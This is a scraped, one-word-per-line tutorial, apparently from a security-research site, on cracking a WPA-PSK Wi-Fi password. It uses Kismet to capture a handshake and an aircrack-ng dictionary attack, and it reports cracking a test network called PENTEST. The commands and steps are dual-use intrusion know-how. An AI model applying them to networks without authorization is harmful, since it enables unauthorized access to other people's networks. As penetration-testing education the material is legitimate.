Documente Academic
Documente Profesional
Documente Cultură
org
Security
Research
Cracking
WPA-PSK
Security
with
Kismet
and
Aircrack-NG
Written
By
:
Affix
root@root-the.net
What
is
WPA-PSK?
WPA
is
a
more
powerful
security
technology
for
Wi-‐Fi
networks
than
WEP.
It
provides
strong
data
protection
by
using
encryption
as
well
as
strong
access
controls
and
user
authentication.
WPA
utilizes
128-‐bit
encryption
keys
and
dynamic
session
keys
to
ensure
your
wireless
network's
privacy
and
enterprise
security.
There
are
two
basic
forms
of
WPA:
•
WPA
Enterprise
(requires
a
Radius
server)
•
WPA
Personal
(also
known
as
WPA-‐PSK)
Either
can
use
TKIP
or
AES
for
encryption.
Not
all
WPA
hardware
supports
AES.
WPA-‐PSK
is
basically
an
authentication
mechanism
in
which
users
provide
some
form
of
credentials
to
verify
that
they
should
be
allowed
access
to
a
network.
This
requires
a
single
password
entered
into
each
WLAN
node
(Access
Points,
Wireless
Routers,
client
adapters,
bridges).
As
long
as
the
passwords
match,
a
client
will
be
granted
access
to
a
WLAN.
Encryption
mechanisms
used
for
WPA
and
WPA-‐PSK
are
the
same.
The
only
difference
between
the
two
is
in
WPA-‐PSK,
authentication
is
reduced
to
a
simple
common
password,
instead
of
user-‐specific
credentials.
The
Pre-‐Shared
Key
(PSK)
mode
of
WPA
is
considered
vulnerable
to
the
same
risks
as
any
other
shared
password
system
-‐
dictionary
attacks
for
example.
Another
issue
may
be
key
management
difficulties
such
as
removing
a
user
once
access
has
been
granted
where
the
key
is
shared
among
multiple
users,
not
likely
in
a
home
environment
Hardware
• WiFi
Card
with
Monitor
Mode
Capability
• A
minimum
specification
System
capable
of
running
a
Linux
System
Software
• Any
Linux
Distribution
(I
prefer
fedora)
• Kismet
• Aircrack-‐NG
• A
Unix
Formatted
Words
List
2
I
have
that
now
what
do
I
do?
Glad
you
asked
that
question,
Simply
type
Kismet
into
a
command
line
terminal
as
shown.
[Affix@localhost wpa-kismet]$ kismet
Well
that
wasn’t
so
hard.
You
may
be
prompted
to
start
the
kismet
server
if
so
click
[Yes]
or
press
enter,
You
will
now
be
prompted
for
your
root
password.
Once
done
you
should
start
monitoring
some
networks
as
shown
in
the
screenshot
below.
Incase
you
didn’t
realize
the
network
we
are
going
to
be
cracking
here
is
PENTEST.
As
shown
in
the
above
screenshot
there
is
a
column
called
Size.
We
need
the
size
of
the
packets
to
be
above
0B.
Our
target
network
has
12K
so
we
are
good
to
go.
Although
we
have
data
however,
We
may
not
have
a
WPA
Handshake.
As
this
is
a
test
network
I
have
setup
I
know
there
is
a
WPA
Handshake
on
the
packet.
Take
a
note
of
the
BSSID
of
your
target
network.
In
our
example
this
is
00:14:7F:64:3E:BF
Before
you
continue
to
read
on
please
ensure
you
have
a
“*.pcapdump”
file
available.
3
Open
a
new
terminal
window
and
get
the
name
of
your
pcapdump
I
have
renamed
mines
to
belegit.pcapdump
for
ease
of
use.
And
type
the
following
into
your
terminal.
[Affix@localhost ~]$ aircrack-ng –a 2-w <wordlistpath> belegit.pcapdump
If
like
me
you
have
more
than
one
network
in
your
pcapdump
you
will
be
prompted
to
enter
a
number
Opening belegit.pcapdump
With
any
luck
this
should
have
cracked
your
password.
Again
as
this
is
a
PENTEST
Network
I
know
it
did.
You
will
be
prompted
with
an
output
similar
to
the
following.
Yes
the
password
was
12345678.
Congratulations
you
have
successfully
cracked
your
first
WiFi
network!
4
FAQ
Q
–
I
get
the
error
“ERROR:
mac80211_setchannel()
could
not
set
channel
x/xxxx
on
interface
‘x’
err
-‐16”
A
–
This
is
because
your
interface
is
currently
in
use.
Please
disconnect
from
any
networks
the
interface
is
connected
and
try
again.
5